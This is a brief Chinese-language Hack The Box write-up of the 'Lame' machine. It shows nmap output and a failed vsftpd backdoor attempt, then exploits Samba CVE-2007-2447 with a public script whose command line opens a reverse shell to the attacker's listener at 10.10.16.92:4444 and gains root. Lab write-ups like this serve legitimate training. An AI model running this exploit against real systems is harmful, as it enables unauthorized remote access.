Hack The Box::Lame
0x00 信息收集
nmap -Pn -sV -T 4 -A 10.10.10.3
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.16.92
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
| vulners:
| cpe:/a:openbsd:openssh:4.7p1:
| CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
| CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
| CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
| CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
|_ CVE-2008-5161 2.6 https://vulners.com/cve/CVE-2008-5161
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)
共四个端口且都是与服务有关,因此尝试从这些服务入手。
0x01 漏洞利用
ftp服务允许匿名登录,但是登录进去后未发现任何文件。
经搜索 vsftp 2.3.4 有 Backdoor Command Execution,通过msf执行,创建session失败。
22端口的ssh服务未发现可以利用的漏洞。
唯一可以利用的就只剩下samba服务,搜索有关samba 3的相关漏洞。
https://github.com/amriunix/CVE-2007-2447
利用github中的脚本,成功反弹shell,并是管理员权限。
pip install pysmb
python usermap_script.py 10.10.10.3 445 10.10.16.92 4444
Hack The Box::Lame相关推荐
- 【Hack The Box】linux练习-- SneakyMailer
HTB 学习笔记 [Hack The Box]linux练习-- SneakyMailer
- Hack The Box - Access Writeup
第一次尝试Hack The Box,在难度较低的Access上,前后花了有两天的时间,汗.收获还是很大,在此记录一下,以便后阅. 首先是获取user,通过nmap扫描,可以发现目标主机开了三个端口21 ...
- Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权
Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...
- 【Hack The Box】linux练习-- Blunder
HTB 学习笔记 [Hack The Box]linux练习-- Blunder
- Hack The Box - Catch 利用let chat API查询信息,Cachet配置泄露漏洞获取ssh登录密码,apk代码注入漏洞利用获取root权限
Hack The Box-Catch Hack The Box开始使用流程看这篇 文章目录 Hack The Box-Catch 整体思路 1.Nmap扫描 2.apk文件信息收集 3.lets ch ...
- 【Hack The Box】windows练习-- Silo
HTB 学习笔记 [Hack The Box]windows练习-- Silo
- 【Hack The Box】linux练习-- Ophiuchi
HTB 学习笔记 [Hack The Box]linux练习-- Ophiuchi
- 【Hack The Box】linux练习-- Doctor
HTB 学习笔记 [Hack The Box]linux练习-- Doctor
- 【Hack The Box】linux练习-- Tabby
HTB 学习笔记 [Hack The Box]linux练习-- Tabby
最新文章
- 斯坦福大学公开课:iPhone开发教程2010年冬
- Apache URL重写的配置 及其 apache500错误
- 常见RAID的各级别的特性简介(RAID0、1、5、6、10)
- centos系统rpm命令
- VS2012 打包部署程序
- jQuery api学习笔记
- 【思维】javascript选择排序
- nofollow标签_SEO技术动态:谷歌升级Nofollow标签的作用
- 用python对单一微博文档进行分词——jieba分词(加保留词和停用词)
- SQL Server 高可用性(六)日志传送
- 《Python机器学习——预测分析核心算法》——2.3 对“岩石vs.水雷”数据集属性的可视化展示...
- 用Markdown做日记和任务跟踪的DailyNotes
- 中兴java笔试题_中兴Java开发笔试题目及答案(7)
- 牛刀小试imageROI
- 深入理解Java内存模型的volatile语义
- 俞敏洪:35岁前如何实现自我增值?
- 怎样做好服务器运维工作
- 寂然安静到鸿蒙翻译,明道篇
- Graphite 简介
- 关于栈顶指针初值为-1和0的区别
热门文章
- 2020本科校招-从小白到拿到30k offer的学习经历
- Netflix 如何解决身份验证问题?
- 转转闲鱼链接源码搭建+后台管理
- ABP VNext学习日记29
- 【Libreoffice整合SpringBoot】只需这一篇
- idea使用antlr_在IDEA中使用ANTLR4教程
- 微信小程序实现标签栏
- xshell如何连接远程服务器
- 不要和一种编程语言厮守终生:为工作正确选择
- Exception in thread “main“ java.lang.Error: Unresolved compilation problem: No enclosing instance